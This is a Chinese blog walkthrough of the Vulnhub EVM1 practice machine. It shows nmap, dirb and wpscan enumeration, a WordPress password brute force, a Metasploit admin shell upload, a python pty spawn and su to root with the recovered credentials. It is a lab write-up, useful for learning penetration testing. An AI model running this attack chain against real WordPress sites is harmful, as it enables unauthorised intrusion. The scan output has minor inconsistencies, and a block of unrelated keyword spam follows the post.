千家信息网

Vulhub-EVM1靶机

发表于:2024-11-29 作者:千家信息网编辑
千家信息网最后更新 2024年11月29日,一.环境搭建https://www.vulnhub.com/entry/evm-1,391/下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)ip为1
千家信息网最后更新 2024年11月29日Vulhub-EVM1靶机

一.环境搭建
https://www.vulnhub.com/entry/evm-1,391/

下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)


ip为192.168.124.156
二.信息搜集:
(端口扫描)

nmap -A 192.168.124.56Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56)Host is up (0.00035s latency).Not shown: 993 closed portsPORT    STATE SERVICE     VERSION22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)|   256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)|_  256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)| dns-nsid: |_  bind.version: 9.10.3-P4-Ubuntu80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works110/tcp open  pop3?139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open  imap        Dovecot imapd|_imap-capabilities: CAPABILITY445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)MAC Address: 00:0C:29:C4:5F:AA (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC:  (unknown)| smb-os-discovery: |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)|   Computer name: ubuntu-extermely-vulnerable-m4ch2ine|   NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00|   Domain name: \x00|   FQDN: ubuntu-extermely-vulnerable-m4ch2ine|_  System time: 2019-12-16T01:48:21-05:00| smb-security-mode: |   account_used: guest|   authentication_level: user|   challenge_response: supported|_  message_signing: disabled (dangerous, but default)| smb2-security-mode: |   2.02: |_    Message signing enabled but not required| smb2-time: |   date: 2019-12-16 01:48:21|_  start_date: N/A

(目录扫描)
开始使用dirb进行目录扫描dirb http://192.168.124.56/

从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan

wpscan --url http://192.168.124.56/wordpress/ -e u

成功得到账号c0rrupt3d_brain,现在继续破解他的密码
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt

成功破解出密码24992499

现在开始使用msfconsole 使用模块

unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi /wordpressrun

直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件

现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:

shellpython -c "import pty;pty.spawn('/bin/bash')"su root

密码输入为:willy26

成功拿到root

密码 目录 成功 文件 模式 网卡 接下来 主机 信息 工具 模块 环境 端口 账号 镜像 页面 别为 输入 配置 靶机 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 生产性服务业包括软件开发吗 数据库系统概论事务日志 元数据获取所有数据库名称 移动软件开发 赛项 数据库newtuple用法 英雄杀一直连接服务器怎么回事 坦克世界玩那个服务器好 软件开发的德企 电大数据库应用技术单元自测 网络安全技术员能入侵渗透吗 栖霞管理系统软件开发公司 南京哪个学校买了wind数据库 怎么查服务器开放的主要服务 中稷光烽(青岛)互联网科技有限公司 袁青 青海省公安厅网络安全总队 市教育系统网络安全工作会议 校园网连接客户端服务器失败 事关网络安全知识大全 内蒙古通讯软件开发服务厂家现货 sntp服务器地址广东 小学生网络安全作文200字 软件开发小时费 数据库获取的值如何替换 网络技术与akf关系 mysql 清理数据库 数据库班级表设计介绍 山东一六八网络技术有限公司 石狮网络安全护航 淄博联想服务器总代理批发 网络安全世技赛
0